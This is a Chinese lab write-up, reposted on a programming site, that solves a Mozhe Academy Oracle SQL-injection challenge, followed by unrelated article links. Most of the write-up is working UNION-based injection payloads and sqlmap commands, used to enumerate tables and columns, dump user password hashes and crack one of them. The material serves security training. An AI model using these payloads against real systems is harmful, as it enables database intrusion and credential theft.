墨者学院手工注入题解(oracle数据库)

墨者学院手工注入题解(oracle数据库)

news2024/9/25 15:23:53

简介

Oracle 数据库系统，是美国ORACLE公司（甲⻣⽂）提供的以分布式数据库为核⼼的⼀组软件产品。是⽬前世界上使⽤最为⼴泛的，数据库管理系统。

以下是手工注入的流程：

1、判断注入点

使用 and 1=1 进行拼接

2、确定字段数

使用语句 order by

最终确定为只有两个字段

3、确定返回点

使用语句 ?id=-1 union select 'null','null' from dual

4、确定数据库名称

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 --current-db 查看当前数据库

5、确定数据库中的表名

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 -D SYSTEM --tables

6、查询列名

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual 进行模糊搜索

确定第一列为 user_name

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual 进行模糊搜索

确定第二列为 user_pwd

7、获取账号以及密码

使用语句 new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

确定zhong 的密码为 1c63129ae9asc60asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

确定 hu 的密码为 1c63129ae9db9g20asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

确定 mozhe 的密码为 48b58ef8be01ef64e7de3f764ec83d2d

8、使用MD5进行密码解密

最终确定 mozhe 的密码为 267581

9、登录后台

10、提交KEY

KEY：mozhe89c06b9c5a5b67c98c500a1ce66

安全

网络安全靠人民，网络安全为人民

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2073701.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

C语言-实参和形参数据传递的特点及使用技巧

C语言-实参和形参数据传递的特点及使用技巧

🌏个人博客：尹蓝锐的博客引言： 在我们介绍实参和形参数据传递的特点及使用技巧之前，我们先拿一个有关值传递的典型错误案例来剖析一下。典型错误举例： #define _CRT_SECURE_NO_WARNINGS 1 #include <stdio.h&g…

阅读更多...

学习笔记——TypeScript

学习笔记——TypeScript

文章目录介绍TS增加类型支持的原因：安装typescript运行TS文件TS常用类型类型标注位置字符串类型、数字类型、布尔类型字面量类型interface类型class类总结开发阶段规范代码，使代码更严谨介绍 TypeScript（简称：TS）…

阅读更多...

《操作系统---PV操作》（同步与互斥）

《操作系统---PV操作》（同步与互斥）

一、练习题面包师有很多面包，由n名销售人员推销。每名顾客进店后按序取一个号，并且等待叫号，当一名销售人员空闲时，就按序叫下一个号。可以用两个整型变量来记录当前的取号值和叫号值，试设计一个使销售人员和顾客同步…

阅读更多...

PyTorch深度学习模型训练流程的python实现：回归

PyTorch深度学习模型训练流程的python实现：回归

回归的流程与分类基本一致，只需要把评估指标改动一下就行。回归输出的是损失曲线、R^2曲线、训练集预测值与真实值折线图、测试集预测值散点图与真实值折线图。输出效果如下： 注意：预测值与真实值图像处理为按真实值排序，图中呈现…

阅读更多...

聚合智链已获道富环球投资，正式上线AI合约策略资金托管平台

聚合智链已获道富环球投资，正式上线AI合约策略资金托管平台

全球最大的托管银行之一道富环球首次进军加密货币领域，聚合智链获得其投资支持，打造出全球领先的AI合约策略资金托管平台，将在2024年8月 28 日正式上线。道富环球集团的总部位于美国，其成立于1792年，是一家专注于托管…

阅读更多...

easypoi模板导出word多页导出加强版

easypoi模板导出word多页导出加强版

说明上一篇文章提到多页导出，但是后边发现一个问题，如果用同一个模板导出多页内容，我们去获取多页内容的时候，会发现全部都一样，举个例子： XWPFDocument document WordExportUtil.exportWord07(outputU…

阅读更多...

$深度学习入门-第4章-神经网络的学习$

深度学习入门-第4章-神经网络的学习

学习就是从训练数据中自动获取最优权重参数的过程。引入损失函数这一指标，学习的目的是找出使损失函数达到最小的权重参数。使用函数斜率的梯度法来找这个最小值。人工智能有两派，一派认为实现人工智能必须用逻辑和符号系统，自顶向下看问题…

阅读更多...

java-Mybatis框架

java-Mybatis框架

简介 MyBatis 是一款优秀的持久层框架，它支持自定义 SQl、存储过程以及高级映射。MyBatis 免除了几乎所有的 JDBC 代码以及设置参数和获取结果集的工作。MyBatis 可以通过简单的 XML 或注解来配置和映射原始类型、接口和 Java POJO（Plain Old Java Obje…

阅读更多...

DFS 算法：全排列问题

DFS 算法：全排列问题

我的个人主页 {\large \mathsf{{\color{Red} 我的个人主页} } } 我的个人主页往 {\color{Red} {\Huge 往} } 往期 {\color{Green} {\Huge 期} } 期文 {\color{Blue} {\Huge 文} } 文章 {\color{Orange} {\Huge 章}} 章 DFS 算法：记忆化搜索此系列更新频繁&…

阅读更多...

k8s中service对象

k8s中service对象

文章目录一、Service简介Service和kube-proxy的作用与区别Service的工作过程kube-proxy的工作过程总结二、具体实践ClusterIPClusterIP 基本概念应用场景 NodePortNodePort 简介应用场景 ExternalName简介应用场景一、Service 简介 Kubernetes (k8s) 中的 Service 对象是一…

阅读更多...

使用redis设计延迟队列

使用redis设计延迟队列

目录延迟队列概念与重要性定义：延迟队列的基本概念重要性：延迟队列在处理异步任务中的关键作用图表：延迟队列的工作流程图编辑延迟队列设计案例背景介绍设计目标系统架构设计要点现有物理拓扑图表：有赞延迟…

阅读更多...

GStreamer 简明教程（五）：Pad 相关概念介绍，Pad Capabilities/Templates

GStreamer 简明教程（五）：Pad 相关概念介绍，Pad Capabilities/Templates

系列文章目录 GStreamer 简明教程（一）：环境搭建，运行 Basic Tutorial 1 Hello world! GStreamer 简明教程（二）：基本概念介绍，Element 和 Pipeline GStreamer 简明教程（三…

阅读更多...

自修C++Primer----3.2标准库类型string

自修C++Primer----3.2标准库类型string

目录 1.String的相关操作 1.1拷贝初始化&&直接初始化 1.2显示创建临时对象 1.3读取string对象内容 1.4一次读取多个未知对象 1.5使用getline读取一整行内容 1.6size()的返回值size_type类型 1.7两个string对象比较 1.8string对象赋值 1.9两个string对象相加 1…

阅读更多...

策略产品 ①算法逻辑

策略产品 ①算法逻辑

目录一、机器学习与AI的关系二、机器学习全流程 1. 问题定义 2. 数据处理 3. 特征工程 4. 模型训练 5. 模型评估 6. 模型应用机器学习是AI的关键技术之一，是指机器从历史数据中学习规律，从而提升系统某个性能度量的过程。这篇文章，我们在作…

阅读更多...

C Primer Plus第十四章编程练习，仅供参考

C Primer Plus第十四章编程练习，仅供参考

第十四章编程练习第一个问题让我们改写复习题5，创建一个函数去计算一年到某个月份的天数，在一个结构数组中去存储相关数据。完整程序代码以及运行结果如下： #include<stdio.h> #include<string.h> #include<ctype.h> st…

阅读更多...

当外接硬盘接入到macOS上，只读不可写时，应当格式化

当外接硬盘接入到macOS上，只读不可写时，应当格式化

当windows磁盘格式例如 NTFS 的硬盘接入到macOS上时，会发现无法新建文件夹，无法删除、重命名。原因是磁盘格式对不上macOS，需要进行格式化。格式化时请注意备份重要数据。具体做法如下，在macOS中找到磁盘工具，然后对磁…

阅读更多...

【HTML】常用几种模拟动画效果【附源代码】

【HTML】常用几种模拟动画效果【附源代码】

1. 模拟音频波纹加载效果 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta http-equiv"X-UA-Compatible" content"IEedge"><meta name"viewport" content"widthde…

阅读更多...

计算机视觉编程

计算机视觉编程

目录灰色度缩略图拷贝粘贴区域调整图像尺寸旋转图像45 画图线、描点灰色度灰度是指图像中每个像素的亮度值，用来描述图像中各个像素的明暗程度。在计算机视觉中，灰度可以通过以下方式来计算： 1. 平均值法：将图像中每…

阅读更多...

如何在程序中创建出多条线程

如何在程序中创建出多条线程

多线程是编程中的一个重要概念，它允许程序同时执行多个任务，每个任务可以看作是一个线程。在Java中，多线程尤为常见且强大，它通过允许程序在并发环境下运行，提高了程序的执行效率和响应速度。以下是对Java多线程的详细…

阅读更多...

数学建模~~~预测方法--决策树模型

数学建模~~~预测方法--决策树模型

目录 0.直击重点 1.决策树概念 2.节点特征的选择算法 3.基尼系数的计算 4.决策树的分类 5.模型的搭建 6.模型的改进和评价 ROC曲线参数调优 GridSearch网格搜索使用搜索结果重新建模 0.直击重点这个文章，我们从三个维度进行说明介绍&#…

阅读更多...

推荐文章

最新文章